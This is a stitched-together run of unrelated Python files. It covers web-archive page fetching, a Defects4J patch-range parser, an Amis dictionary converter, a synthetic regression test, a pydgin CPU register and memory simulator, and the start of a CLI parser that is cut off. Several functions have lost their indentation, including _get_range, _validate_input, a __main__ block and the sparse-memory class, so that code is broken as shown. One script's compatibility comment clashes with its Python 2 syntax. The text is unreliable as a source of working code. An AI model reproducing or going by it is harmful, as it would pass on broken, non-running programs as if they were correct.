            return "image/png", "genimg.%s.png", img_dat

        return self.job.mimetype, fname, contents

    def getCacheState(self):
        """Return a human-readable age string for the cached fetch."""
        assert self.fetched
        fetched = self.job.fetchtime
        if fetched is None:
            fetched = datetime.datetime.now()
        ago = datetime.datetime.now() - fetched
        return td_format(ago)

    def processRaw(self, content, mimetype='text/html', starturl='http://www.example.org'):
        """Run raw content through the fetcher's dispatch path and relink it."""
        # Abuse the fact that functions (including lambda) are fully formed objects
        job = lambda:None
        job.url = self.url
        job.priority = 9
        job.starturl = "http://www.example.org"
        job.distance = common.database.MAX_DISTANCE-2
        job.netloc = urllib.parse.urlsplit(self.url).netloc
        fetcher = self.archiver.fetcher(self.archiver.ruleset, target_url=job.url, start_url=job.starturl, db_sess=self.archiver.db_sess, job=job, cookie_lock=False)
        print(fetcher)
        ret = fetcher.dispatchContent(content, "None", "text/html")
        content = ret['contents']
        content = utilities.replace_links(content)
        return content

    def dispatchRetreived(self, parentjob, content, mimetype):
        """Feed already-downloaded content into the archiver under parentjob."""
        print("Dispatching prefetched content!")
        assert bool(content) == True
        self.archiver.synchronousDispatchPrefetched(self.url, parentjob, content, mimetype)

    def close(self):
        """Release the archiver reference (no pooling at present)."""
        # WebMirror.runtime_engines.fetchers.put(self.archiver)
        self.archiver = None

    # def __del__(self):
    # 	if self.archiver != None:
    # 		print("ERROR! Archiver not released!")
def processRaw(content):
    """Process raw HTML through the archiver pipeline and return the relinked result."""
    remote = RemoteContentObject("http://www.example.org")
    try:
        return remote.processRaw(content)
    finally:
        remote.close()
def getPage(url, ignore_cache=False, version=None):
    """
    Synchronously fetch a page.

    Returns a (title, content, cachestate) tuple; on download failure the
    tuple comes from getErrorDiv(), and filtered URLs get a 'Filtered'
    placeholder tuple.
    """
    assert not (version and ignore_cache)
    # BUGFIX: check the URL filter *before* fetching. The original fetched
    # first and then discarded the result for filtered URLs, wasting a full
    # network fetch (and archiving content we refuse to serve).
    if any([tmp.lower() in url.lower() for tmp in common.global_constants.GLOBAL_BAD_URLS]):
        bad_segs = [tmp for tmp in common.global_constants.GLOBAL_BAD_URLS if tmp.lower() in url.lower()]
        return (
            'Filtered',
            'Url %s is filtered by GLOBAL_BAD_URLS (%s)' % (url, bad_segs),
            'filtered',
        )
    page = RemoteContentObject(url)
    if version:
        assert isinstance(version, int)
    try:
        page.fetch(ignore_cache, version)
        title = page.getTitle()
        content = page.getContent("/view?url=")
        cachestate = page.getCacheState()
    except DownloadException:
        title, content, cachestate = getErrorDiv()
    finally:
        page.close()
    return title, content, cachestate
@contextlib.contextmanager
def getPageRow(url, ignore_cache=False, session=None):
    """Context manager yielding a fetched RemoteContentObject, or None on download failure."""
    remote = RemoteContentObject(url, db_session=session)
    print("Page object: ", remote)
    try:
        print("doing fetch: ")
        remote.fetch(ignore_cache=ignore_cache)
        print("Fetched. Yielding")
        yield remote
    except DownloadException:
        yield None
    finally:
        remote.close()
def getResource(url, ignore_cache=False, session=None):
    '''
    Get a url that (probably) contains resource content synchronously.
    Return is a 4-tuple consisting of (mimetype, filename, filecontent, cache-state)
    '''
    lowered = url.lower()
    bad_segs = [tmp for tmp in common.global_constants.GLOBAL_BAD_URLS if tmp.lower() in lowered]
    if bad_segs:
        notice = 'Url %s is filtered by GLOBAL_BAD_URLS (%s)' % (url, bad_segs)
        return ('text/ascii', notice, notice, 'filtered')
    resource = RemoteContentObject(url, db_session=session)
    try:
        resource.fetch(ignore_cache)
        mimetype, fname, content = resource.getResource()
        cachestate = resource.getCacheState()
    finally:
        resource.close()
    return mimetype, fname, content, cachestate
def processFetchedContent(url, content, mimetype, parentjob, db_session=None):
    """Dispatch already-downloaded content into the archiver pipeline for *url*."""
    remote = RemoteContentObject(url, db_session=db_session)
    try:
        return remote.dispatchRetreived(parentjob, content, mimetype)
    finally:
        remote.close()
|
import os
import re
import sys
from os.path import abspath
# Root of the Defects4J project metadata; patch files live under <project>/patches.
D4J = abspath('../../analyzers/defects4j/framework/projects')
# Output directory where code-diff.csv is appended.
OUTPUT_DIR = abspath('../auxiliary-data')
class GitHubPatch:
    """One changed-line range of one file within a Defects4J patch."""

    def __init__(self, image_tag, filename, patch_lower, patch_upper):
        self.image_tag = image_tag
        self.filename = filename
        self.patch_lower = patch_lower
        self.patch_upper = patch_upper

    def to_CSV(self):
        """Serialise the record as one CSV row (no trailing newline)."""
        fields = (self.image_tag, self.filename, self.patch_lower, self.patch_upper)
        return ','.join(str(field) for field in fields)
def main(argv=None):
    """
    Entry point: read image tags (one per line, e.g. 'Lang-12'), compute the
    changed-line ranges for each bug's patch files, and append them to
    OUTPUT_DIR/code-diff.csv.
    """
    argv = argv or sys.argv
    image_tag_file = _validate_input(argv)
    patch_list = []
    with open(image_tag_file) as file:
        for image_tag in file:
            image_tag = image_tag.strip()
            # ROBUSTNESS: a blank/trailing line used to crash the unpack below.
            if not image_tag:
                continue
            project, num_id = image_tag.split('-')
            try:
                file_ranges = _get_files_changed(project, num_id)
                patch_list.extend(_create_GitHubPatch_list(image_tag, file_ranges))
            except Exception:
                # Some bugs lack patch files; skip them. BUGFIX: was a bare
                # `except:`, which also swallowed KeyboardInterrupt/SystemExit.
                continue
    with open(os.path.join(OUTPUT_DIR, 'code-diff.csv'), 'a') as file:
        for patch in patch_list:
            file.write(patch.to_CSV() + '\n')
def _get_range(sub_line, sub_range, add_line, add_range):
# Catches @@ -2,5 +2,6 @@
if sub_line and sub_range and add_line and add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), int(sub_range), int(add_line), int(add_range)
# Catches @@ -0,0 +1 @@
elif sub_line and sub_range and add_line and add_range is None:
# elif sub_line and sub_range and add_line and not add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), int(sub_range), int(add_line), 0
# Catches @@ -1 +1,2 @@
elif sub_line and sub_range is None and add_line and add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), 0, int(add_line), int(add_range)
# Catches @@ -1 +1 @@
elif sub_line and sub_range is None and add_line and add_range is None:
sub_line, sub_range, add_line, add_range = int(sub_line), 0, int(add_line), 0
if sub_line < add_line:
range_lower = sub_line
range_upper = add_line + add_range
elif sub_line > add_line:
range_lower = add_line
range_upper = sub_line + sub_range
else: # sub_line == add_line
range_lower = add_line
range_upper = add_line + max(sub_range, add_range)
return range_lower, range_upper
def _get_files_changed(project, num_id):
    """
    Parse the Defects4J src/test patch files for one bug and return a dict
    mapping changed filename -> list of (range_lower, range_upper) tuples.

    Hunks are attributed positionally: the i-th hunk header goes to the i-th
    '---' filename, and parsing stops once every filename has one range
    (this preserves the original's attribution scheme).

    Raises IOError/OSError when a patch file is missing; main() skips those.
    """
    src_fp = '{}/{}/patches/{}.src.patch'.format(D4J, project, num_id)
    test_fp = '{}/{}/patches/{}.test.patch'.format(D4J, project, num_id)

    # Concatenate the stripped lines of both patch files.
    file_lines = []
    for path in [src_fp, test_fp]:
        with open(path) as f:
            file_lines.extend(line.strip() for line in f)

    # First pass: collect the changed filenames from '--- a/path/File.java'.
    file_ranges = {}
    fn_map = {}
    fn_count = 0
    for line in file_lines:
        match_obj = re.search(r'--- (.+)', line)
        if match_obj:
            fn = match_obj.group(1).split('/')[-1]
            file_ranges[fn] = []
            fn_map[fn_count] = fn
            fn_count += 1

    # Second pass: turn each hunk header into a line range.
    count = 0
    for line in file_lines:
        if count >= fn_count:
            break
        if not line:
            # BUGFIX: original read `if line is None: contune` — a NameError
            # typo that never fired because stripped lines are '' not None.
            continue
        match_obj = re.search(r'^@@ -([0-9]+),?([0-9]+)? \+([0-9]+),?([0-9]+)? @@', line)
        if match_obj:
            range_lower, range_upper = _get_range(match_obj.group(1), match_obj.group(2),
                                                  match_obj.group(3), match_obj.group(4))
            file_ranges[fn_map[count]].append((range_lower, range_upper))
            count += 1
    return file_ranges
def _create_GitHubPatch_list(image_tag, files_changed_list):
    """Flatten {filename: [(lower, upper), ...]} into GitHubPatch records for *image_tag*."""
    return [
        GitHubPatch(image_tag, filename, lower, upper)
        for filename in files_changed_list
        for lower, upper in files_changed_list[filename]
    ]
def _print_usage():
    """Print the command-line usage message for this script."""
    print('Usage: python3 approx_lines_changed.py <image_tag_filepath>')
    print('image_tag_filepath: The filepath to the new-line separated file containing image-tags')
def _validate_input(argv):
if len(argv) != 2:
_print_usage()
sys.exit(1)
image_tag_file = argv[1]
return image_tag_file
# Script entry point; exit status comes from main() (None -> 0).
if __name__ == '__main__':
    sys.exit(main())
|
<reponame>miaoski/amis-safolu<gh_stars>1-10
# -*- coding: utf8 -*-
# Convert .txt files in the same directory to dict-amis.json for moedict
import sys
import codecs
import re
# Matches bracketed tags ending in a digit, e.g. "[...2]".
pat = "\[.*?(\d)\]"
reg = re.compile(pat)
# Accumulated output dictionary: title -> moedict word entry (filled by readdict()).
JSON = {}
def removeStems(s):
    """Strip the trailing ideographic period and any parenthesised stem, returning the bare headword."""
    s = s.replace(u'。', '')  # Dirty
    paren = s.find("(")
    if paren >= 0:
        s = s[:paren]
    return s.strip()
def getStem(s):
    """
    Return the parenthesised stem in *s* (the text inside the first
    '( ... )' group), or None when there is no parenthesised part.
    """
    # BUGFIX/compat: was ur'\(.+\)' — the combined u+r prefix is Python-2-only
    # syntax; a plain raw string behaves identically on both 2 and 3.
    stem_r = re.search(r'\(.+\)', s)
    if stem_r:
        # Slice off the surrounding parentheses.
        return s[stem_r.start() + 1:stem_r.end() - 1]
    else:
        return None
def affixation(s):
    """Split *s* into word tokens, run each through the gnostic stemmer, and rejoin."""
    import re
    from amis_stemmer import gnostic
    cleaned = s.replace(u'。', '').strip()
    tokens = re.split(r"([\w:'^]+)", cleaned)
    return ''.join(gnostic(tok) for tok in tokens)
# Interlinear markers used by the moedict front-end:
#   \ufff9: Amis example sentence
#   \ufffa: English example sentence
#   \ufffb: Chinese example sentence
def addsplt(s):
    """Interleave the moedict interlinear markers with the three example lines in *s*."""
    pieces = [u'\ufff9', s[0], u'\ufffa', s[1], u'\ufffb', s[2]]
    return u''.join(pieces)
def mkword(title, definitions, tag, stem):
    """
    Insert a word entry into the global JSON dict, appending an extra
    heteronym when the title already exists.
    """
    global JSON
    word = {'title': title,
            'heteronyms': [{'definitions': definitions}]}
    if tag:
        word['tag'] = tag
    if stem:
        word['stem'] = stem
    if title in JSON:
        # Same headword seen again: record as an additional heteronym.
        print "Add heteronym: " + title
        JSON[title]['heteronyms'].append({'definitions': definitions})
    else:
        JSON[title] = word
def mkdef(defi, examples, link):
    """
    Build one moedict definition dict: optional 'example' list, the 'def'
    text, and optional 'synonyms' (each related word run through affixation).
    Key insertion order (example, def, synonyms) is preserved so the JSON
    output is unchanged.
    """
    defdic = {}
    if len(examples) > 0:
        defdic['example'] = examples
        # BUGFIX: dropped the original's dead `examples = []` rebind — it only
        # reassigned the local name and had no effect on the caller or result.
    defdic['def'] = defi
    if link:
        # List comprehension instead of map(): identical on Python 2, and on
        # Python 3 a bare map object would not be JSON-serialisable.
        defdic['synonyms'] = [affixation(word) for word in link]
    return defdic
def readdict(fn):
    """
    Parse one dictionary .txt file and register every entry via mkword().

    Line-oriented state machine; states:
      None -> expecting a headword line
      'd'  -> expecting a Chinese definition
      'ed' -> expecting an Amis example sentence
      'a'  -> after the Amis example (next indented line is its translation)
      'ea' -> expecting the Chinese example sentence
      'l'  -> related-word line
    Entries are terminated by a blank line (or end of file).
    """
    fp = codecs.open(fn, mode='r', encoding='utf8')
    title = None        # headword
    tag = None          # reduplication / loanword tag
    stem = None         # word stem
    state = None
    num_words = 0
    for line in fp:
        # Strip the circled-digit sense markers before any processing.
        l = line.replace(u'① ', '') \
                .replace(u'② ', '') \
                .replace(u'③ ', '') \
                .replace(u'④ ', '') \
                .replace(u'⑤ ', '') \
                .replace(u'⑥ ', '') \
                .replace(u'⑦ ', '') \
                .replace(u'⑧ ', '') \
                .replace(u'⑨ ', '')
        l = l.strip()
        if l == '' and title:        # blank line: flush the finished entry
            num_words += 1
            defdic = mkdef(defi, examples, link)
            if len(defdic) > 0:
                definitions.append(defdic)
            mkword(title, definitions, tag, stem)
            title = None
            state = None
            tag = None
            stem = None
            definitions = []
            examples = []
            link = []
            defi = ""
            continue
        if l == '':                  # blank line outside an entry
            continue
        if l[0] == '#':              # comment line
            continue
        if state is None:            # headword line starts a new entry
            stem = getStem(l)
            title = removeStems(l)
            definitions = []
            examples = []
            link = []
            defi = ""
            state = 'd'
            continue
        if l[0:2] == '=>':           # related-word line
            state = 'l'
        # Indentation on the *raw* line marks example sentences.
        if line[0:4] == '    ':
            state = 'e' + state
        if state == 'd':             # Chinese definition
            # Extract part-of-speech / loanword / reduplication / affix tags
            # such as "[...2]" or borrowed-word markers.
            tag_r = re.search(ur'(\[([^]]+詞|[^]]+語|疊[^]]*|[^]]+綴)\])', l)
            if tag_r:
                tag = l[tag_r.start():tag_r.end()]
                l = l.replace(tag, '').replace(u'。。', u'。')
            if defi!="":             # a previous definition is pending: flush it
                defdic = mkdef(defi, examples, link)
                if len(defdic) > 0:
                    definitions.append(defdic)
                examples = []
                link = []
            defi = l;
            state = 'd'
            continue
        if state == 'ed':            # Amis example sentence
            # NOTE(review): ex[1] (the English slot) is never filled by any
            # state below; confirm the source files carry no English line.
            ex = [affixation(l), '', '']
            state = 'a'
            continue
        if state == 'ea':            # Chinese example sentence
            ex[2] = l
            examples.append(addsplt(ex))
            state = 'd'
            continue
        if state == 'l':             # related words after '=>'
            link.append(l[2:])
            state = 'd'
    # End of file: flush the last entry if one is still open.
    if title:
        num_words += 1
        defdic = mkdef(defi, examples, link )
        if len(defdic) > 0:
            definitions.append(defdic)
        mkword(title, definitions, tag, stem)
    fp.close()
    print 'Total %d words in %s' % (num_words, fn)
if __name__ == '__main__':
    import glob
    import json
    import re
    import codecs
    # Convert every .txt source in the current directory, then dump the
    # accumulated entries as a single moedict JSON array.
    for fn in glob.iglob('*.txt'):
        print fn
        readdict(fn)
    f = codecs.open('dict-amis.json', mode='w', encoding='utf8')
    f.write(json.dumps(JSON.values(), indent=2, separators=(',', ':'), ensure_ascii = False, encoding="utf8"))
    f.close()
|
# coding: utf-8
from dataclasses import dataclass
import sys
import numpy as np
import numpy.random
import sklearn
import sklearn.metrics
from sklearn.model_selection import cross_val_score
from typing import Callable
# This is easy to try on your own:
# generate ~100 input dimensions of which only 10 are relevant, synthesize
# some f and set y = f(x) + noise with a variance ratio of roughly 1:1000,
# producing artificial random data. Then measure how close your algorithm's
# regressed function is to the true f.
@dataclass
class Dataset:
    # Declared dataclass fields.
    # NOTE(review): the hand-written __init__ below overrides the
    # dataclass-generated constructor and assigns none of these fields, so
    # instances end up with no attributes set — confirm this is intended.
    samples: int
    sn_ratio: float
    true_f: Callable[[np.ndarray], np.ndarray]

    def __init__(self, true_f):
        # Placeholder constructor: discards *true_f* and initialises nothing.
        pass
class TrueFunc:
    """
    Sparse linear ground-truth function: y = x[:, :relevant_dim] @ w,
    with random weights w drawn uniformly from {-1, +1}.
    """

    def __init__(self, relevant_dim, dim):
        abs_fraction = 0.5
        self.dim = dim
        self.relevant_dim = relevant_dim
        self.absdim = int(relevant_dim * abs_fraction)
        # Random +/-1 weights over the relevant dimensions only.
        self.w = numpy.random.randint(2, size=relevant_dim) * 2 - 1

    # x: (sample, dim)
    # y: sample
    def __call__(self, x: np.ndarray):
        # y = X w, restricted to the relevant leading columns.
        relevant = x[:, :self.relevant_dim]
        return np.dot(relevant, self.w)
def add_normalized_noise(ys: np.ndarray, sn_ratio):
    """
    Rescale *ys* in place so its variance equals sn_ratio, then return
    (ys, ys + unit-variance Gaussian noise).

    NOTE: mutates the input array; the second return value is a fresh array.
    """
    ys[:] /= np.std(ys)
    ys[:] *= np.sqrt(sn_ratio)
    noisy = ys + np.random.normal(size=ys.shape)
    return ys, noisy
def synthetic_data(sn_ratio=0.001, relevant_x_ratio=0.1):
    # Unimplemented stub: intended to build the synthetic dataset described
    # in the module comment above (currently returns None).
    pass
# true_y: (sample, dim)
def evaluate(true_y: np.ndarray, y: np.ndarray):
    """Return the mean squared error between the true and predicted targets."""
    return sklearn.metrics.mean_squared_error(true_y, y)
def generate_dataset():
    """
    Build the synthetic regression problem: 10000 samples of 100-d Gaussian
    X with 10 relevant dimensions and a signal/noise variance ratio of 0.001.
    Returns (X, normalized clean targets, noisy targets).
    """
    dim = 100
    relevant_dim = 10
    sn_ratio = 0.001
    sample = 10000
    true_func = TrueFunc(relevant_dim, dim)
    X = numpy.random.normal(size=(sample, dim))
    clean = true_func(X)
    clean, noisy = add_normalized_noise(clean, sn_ratio=sn_ratio)
    return X, clean, noisy
if __name__ == "__main__":
print(sys.version)
X, true_y, y = generate_dataset()
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.model_selection import KFold
kf = KFold(n_splits=10)
scores = []
count = 1
for train, test in kf.split(X, y):
print(count);
count += 1
# model = SVR(kernel="linear", C=0.01, epsilon=0.1)
model = LinearRegression()
model.fit(X[train, :], y[train])
pred_y = model.predict(X[test, :])
score = sklearn.metrics.mean_squared_error(y[test], pred_y)
true_y_std = np.std(true_y)
score = sklearn.metrics.mean_squared_error(true_y[test] / true_y_std, pred_y / true_y_std)
# print(pred_y, y[test])
# print(y[test])
scores.append(score)
# best_score = sklearn.metrics.accuracy_score(np.sign(true_y), np.sign(y))
best_score = sklearn.metrics.mean_squared_error(true_y, numpy.zeros(y.shape))
print(max(true_y))
print(min(true_y))
print(y.shape)
print(true_y.shape)
print("predition score:", np.mean(np.array(scores)))
print("best score:", best_score)
# print(f(np.ones(dim)*-2))
# print(f(np.ones(dim)*-1))
# print(f(np.ones(dim)*1))
# print(f(np.ones(dim)*2))
pass
|
<gh_stars>100-1000
#=======================================================================
# storage.py
#=======================================================================
from pydgin.jit import elidable, unroll_safe, hint
from debug import Debug, pad, pad_hex
from pydgin.utils import r_uint, specialize
# Prefer RPython's boxed 32-bit type when translating; outside RPython plain
# Python ints behave equivalently for this interpreter's purposes.
try:
  from rpython.rlib.rarithmetic import r_uint32, widen
except ImportError:
  # if rpython not in path, we can use normal ints to store data
  r_uint32 = int
  def widen( value ):
    # Plain ints need no widening outside RPython.
    return value
#-----------------------------------------------------------------------
# RegisterFile
#-----------------------------------------------------------------------
class RegisterFile( object ):
  """
  Simulated CPU register file backed by a list of r_uint values.

  With constant_zero=True (the default), writes to register 0 are dropped
  so it always reads as zero (MIPS/RISC-V style).
  """
  def __init__( self, constant_zero=True, num_regs=32, nbits=32 ):
    self.num_regs = num_regs
    self.regs     = [ r_uint(0) ] * self.num_regs
    self.debug    = Debug()
    self.nbits    = nbits
    # Number of hex characters used when tracing register accesses.
    self.debug_nchars = nbits / 4

    # Select the write implementation once, at construction time, instead of
    # branching on constant_zero on every write.
    if constant_zero: self._setitemimpl = self._set_item_const_zero
    else:             self._setitemimpl = self._set_item
  def __getitem__( self, idx ):
    if self.debug.enabled( "rf" ):
      print ':: RD.RF[%s] = %s' % (
                        pad( "%d" % idx, 2 ),
                        pad_hex( self.regs[idx],
                                 len=self.debug_nchars ) ),
    return self.regs[idx]

  # Accept any integer-like value type; coerce to r_uint before storing.
  @specialize.argtype(2)
  def __setitem__( self, idx, value ):
    value = r_uint( value )
    self._setitemimpl( idx, value )

  def _set_item( self, idx, value ):
    self.regs[idx] = value
    if self.debug.enabled( "rf" ):
      print ':: WR.RF[%s] = %s' % (
                        pad( "%d" % idx, 2 ),
                        pad_hex( self.regs[idx],
                                 len=self.debug_nchars ) ),
  def _set_item_const_zero( self, idx, value ):
    # Register 0 is hardwired to zero: silently discard writes to it.
    if idx != 0:
      self.regs[idx] = value
      if self.debug.enabled( "rf" ):
        print ':: WR.RF[%s] = %s' % (
                          pad( "%d" % idx, 2 ),
                          pad_hex( self.regs[idx],
                                   len=self.debug_nchars ) ),

  #-----------------------------------------------------------------------
  # print_regs
  #-----------------------------------------------------------------------
  # prints all registers (register dump)
  # per_row specifies the number of registers to display per row
  def print_regs( self, per_row=6 ):
    for c in xrange( 0, self.num_regs, per_row ):
      str = ""
      for r in xrange( c, min( self.num_regs, c+per_row ) ):
        str += "%s:%s " % ( pad( "%d" % r, 2 ),
                            pad_hex( self.regs[r], len=(self.nbits/4) ) )
      print str
#-----------------------------------------------------------------------
# Memory
#-----------------------------------------------------------------------
def Memory( data=None, size=2**10, byte_storage=False ):
  """
  Factory for a simulated memory.

  Returns a flat _ByteMemory/_WordMemory when running translated under
  RPython, otherwise a _SparseMemory wrapper (block-allocated on demand),
  which is friendlier for untranslated runs.
  """
  # use sparse storage if not translated
  try:
    from rpython.rlib.objectmodel import we_are_translated
    sparse_storage = not we_are_translated()
  except ImportError:
    # No RPython available at all: definitely untranslated.
    sparse_storage = True

  if sparse_storage:
    print "NOTE: Using sparse storage"
    if byte_storage:
      return _SparseMemory( _ByteMemory )
    else:
      return _SparseMemory( _WordMemory )
  else:
    if byte_storage:
      return _ByteMemory( data, size )
    else:
      return _WordMemory( data, size )
#-------------------------------------------------------------------------
# _WordMemory
#-------------------------------------------------------------------------
# Memory that uses ints instead of chars
class _WordMemory( object ):
  """
  Word-granular memory: backing store is a list of 32-bit values
  (r_uint32), addressed in bytes. Sub-word reads/writes mask and shift
  within the containing word.
  """
  def __init__( self, data=None, size=2**10, suppress_debug=False ):
    # One r_uint32 per 4 bytes of memory.
    self.data  = data if data else [ r_uint32(0) ] * (size >> 2)
    self.size  = r_uint(len( self.data ) << 2)
    self.debug = Debug()
    self.suppress_debug = suppress_debug

    # TODO: pass data_section to memory for bounds checking
    self.data_section = 0x00000000

  def bounds_check( self, addr, x ):
    """Raise on out-of-range, null, or below-.data (writes only) accesses."""
    # check if the accessed data is larger than the memory size
    if addr > self.size:
      print ("WARNING: %s accessing larger address than memory size. "
             "addr=%s size=%s") % ( x, pad_hex( addr ), pad_hex( self.size ) )
      raise Exception()
    if addr == 0:
      print "WARNING: accessing null pointer!"
      raise Exception()

    # Special write checks
    if x == 'WR' and addr < r_uint( self.data_section ):
      print ("WARNING: %s writing address below .data section!!!. "
             "addr=%s size=%s") % ( x, pad_hex( addr ), pad_hex( self.data_section ) )
      raise Exception()

  @specialize.argtype(1)
  @unroll_safe
  def read( self, start_addr, num_bytes ):
    """Read 1, 2 or 4 bytes starting at start_addr; returns an r_uint."""
    assert 0 < num_bytes <= 4
    start_addr = r_uint( start_addr )
    # Split the byte address into word index and byte offset within it.
    word = start_addr >> 2
    byte = start_addr &  0b11

    if self.debug.enabled( "mem" ) and not self.suppress_debug:
      print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
    if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
      self.bounds_check( start_addr, 'RD' )

    value = 0
    if   num_bytes == 4:  # TODO: byte should only be 0 (only aligned)
      value = widen( self.data[ word ] )
    elif num_bytes == 2:  # TODO: byte should only be 0, 1, 2, not 3
      mask = 0xFFFF << (byte * 8)
      value = ( widen( self.data[ word ] ) & mask) >> (byte * 8)
    elif num_bytes == 1:
      mask = 0xFF   << (byte * 8)
      value = ( widen( self.data[ word ] ) & mask) >> (byte * 8)
    else:
      raise Exception('Invalid num_bytes: %d!' % num_bytes)

    if self.debug.enabled( "mem" ):
      print '%s' % pad_hex( value ),

    return r_uint( value )

  # this is instruction read, which is otherwise identical to read. The
  # only difference is the elidable annotation, which we assume the
  # instructions are not modified (no side effects, assumes the addresses
  # correspond to the same instructions)
  @elidable
  def iread( self, start_addr, num_bytes ):
    assert start_addr & 0b11 == 0  # only aligned accesses allowed
    return r_uint( widen( self.data[ start_addr >> 2 ] ) )

  @specialize.argtype(1, 3)
  @unroll_safe
  def write( self, start_addr, num_bytes, value ):
    """Write the low 1, 2 or 4 bytes of value at start_addr (read-modify-write for sub-word)."""
    assert 0 < num_bytes <= 4
    start_addr = r_uint( start_addr )
    value      = r_uint( value )
    word = start_addr >> 2
    byte = start_addr &  0b11

    if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
      self.bounds_check( start_addr, 'WR' )

    if   num_bytes == 4:  # TODO: byte should only be 0 (only aligned)
      pass # no masking needed
    elif num_bytes == 2:  # TODO: byte should only be 0, 1, 2, not 3
      # Clear the target halfword, then merge in the new bytes.
      mask  = ~(0xFFFF << (byte * 8)) & r_uint( 0xFFFFFFFF )
      value = ( widen( self.data[ word ] ) & mask ) \
              | ( (value & 0xFFFF) << (byte * 8) )
    elif num_bytes == 1:
      # Clear the target byte, then merge in the new byte.
      mask  = ~(0xFF   << (byte * 8)) & r_uint( 0xFFFFFFFF )
      value = ( widen( self.data[ word ] ) & mask ) \
              | ( (value & 0xFF  ) << (byte * 8) )
    else:
      raise Exception('Invalid num_bytes: %d!' % num_bytes)

    if self.debug.enabled( "mem" ) and not self.suppress_debug:
      print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
                                     pad_hex( value ) ),
    self.data[ word ] = r_uint32( value )
#-----------------------------------------------------------------------
# _ByteMemory
#-----------------------------------------------------------------------
class _ByteMemory( object ):
  """
  Byte-granular memory: backing store is a list of single characters.
  Multi-byte values are stored little-endian (low byte at low address).
  """
  def __init__( self, data=None, size=2**10, suppress_debug=False ):
    self.data  = data if data else [' '] * size
    self.size  = len( self.data )
    self.debug = Debug()
    self.suppress_debug = suppress_debug

  def bounds_check( self, addr ):
    """Warn on out-of-range addresses; raise only on null-pointer access."""
    # check if the accessed data is larger than the memory size
    if addr > self.size:
      print "WARNING: accessing larger address than memory size. " + \
            "addr=%s size=%s" % ( pad_hex( addr ), pad_hex( self.size ) )
    if addr == 0:
      print "WARNING: writing null pointer!"
      raise Exception()

  @unroll_safe
  def read( self, start_addr, num_bytes ):
    """Assemble num_bytes bytes starting at start_addr into an int (little-endian)."""
    if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
      self.bounds_check( start_addr )
    value = 0
    if self.debug.enabled( "mem" ) and not self.suppress_debug:
      print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
    # Walk bytes high-to-low so shifts accumulate the little-endian value.
    for i in range( num_bytes-1, -1, -1 ):
      value = value << 8
      value = value | ord( self.data[ start_addr + i ] )
    if self.debug.enabled( "mem" ) and not self.suppress_debug:
      print '%s' % pad_hex( value ),
    return value

  # this is instruction read, which is otherwise identical to read. The
  # only difference is the elidable annotation, which we assume the
  # instructions are not modified (no side effects, assumes the addresses
  # correspond to the same instructions)
  @elidable
  def iread( self, start_addr, num_bytes ):
    value = 0
    for i in range( num_bytes-1, -1, -1 ):
      value = value << 8
      value = value | ord( self.data[ start_addr + i ] )
    return value

  @unroll_safe
  def write( self, start_addr, num_bytes, value ):
    """Store the low num_bytes bytes of value at start_addr (little-endian)."""
    if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
      self.bounds_check( start_addr )
    if self.debug.enabled( "mem" ) and not self.suppress_debug:
      print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
                                     pad_hex( value ) ),
    for i in range( num_bytes ):
      self.data[ start_addr + i ] = chr(value & 0xFF)
      value = value >> 8
#-----------------------------------------------------------------------
# _SparseMemory
#-----------------------------------------------------------------------
class _SparseMemory( object ):
_immutable_fields_ = [ "BlockMemory", "block_size", "addr_mask",
"block_mask" ]
def __init__( self, BlockMemory, block_size=2**10 ):
self.BlockMemory = BlockMemory
self.block_size = block_size
self.addr_mask = block_size - 1
self.block_mask = 0xffffffff ^ self.addr_mask
self.debug = Debug()
print "sparse memory size %x addr mask %x block mask %x" \
% ( self.block_size, self.addr_mask, self.block_mask )
#blocks = []
self.block_dict = {}
self.debug = Debug()
def add_block( self, block_addr ):
#print "adding block: %x" % block_addr
self.block_dict[ block_addr ] = self.BlockMemory( size=self.block_size,
suppress_debug=True )
@elidable
def get_block_mem( self, block_addr ):
#block_idx = block_dict[
if block_addr not in self.block_dict:
self.add_block( block_addr )
block_mem = self.block_dict[ block_addr ]
return block_mem
@elidable
def iread( self, start_addr, num_bytes ):
start_addr = hint( start_addr, promote=True )
num_bytes = hint( num_bytes, promote=True )
end_addr = start_addr + num_bytes - 1
block_addr = self.block_mask & start_addr
block_mem = self.get_block_mem( block_addr )
# For mixed-width ISAs, the start_addr is not necessarily
# word-aligned, and can cross block memory boundaries. If there is
# such a case, we have two instruction reads and then form the word
# for it
block_end_addr = self.block_mask & end_addr
if block_addr == block_end_addr:
return block_mem.iread( start_addr & self.addr_mask, num_bytes )
else:
num_bytes1 = min( self.block_size - (start_addr & self.addr_mask),
num_bytes )
num_bytes2 = num_bytes - num_bytes1
block_mem1 = block_mem
block_mem2 = self.get_block_mem( block_end_addr )
value1 = block_mem1.iread( start_addr & self.addr_mask, num_bytes1 )
value2 = block_mem2.iread( 0, num_bytes2 )
value = value1 | ( value2 << (num_bytes1*8) )
#print "nb1", num_bytes1, "nb2", num_bytes2, \
# "ba1", hex(block_addr), "ba2", hex(block_end_addr), \
# "v1", hex(value1), "v2", hex(value2), "v", hex(value)
return value
def read( self, start_addr, num_bytes ):
if self.debug.enabled( "mem" ):
print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
block_addr = self.block_mask & start_addr
block_addr = hint( block_addr, promote=True )
block_mem = self.get_block_mem( block_addr )
value = block_mem.read( start_addr & self.addr_mask, num_bytes )
if self.debug.enabled( "mem" ):
print '%s' % pad_hex( value ),
return value
def write( self, start_addr, num_bytes, value ):
if self.debug.enabled( "mem" ):
print ':: WR.MEM[%s] = %s' % ( pad_hex( start_addr ),
pad_hex( value ) ),
block_addr = self.block_mask & start_addr
block_addr = hint( block_addr, promote=True )
block_mem = self.get_block_mem( block_addr )
block_mem.write( start_addr & self.addr_mask, num_bytes, value )
|
<filename>dtlpy/dlp/parser.py
import argparse
def get_parser():
    """
    Build the argparse parser for the Dataloop CLI.

    Top-level commands register under dest="operation"; each entity command
    (api, projects, datasets, items, videos, services, triggers, packages)
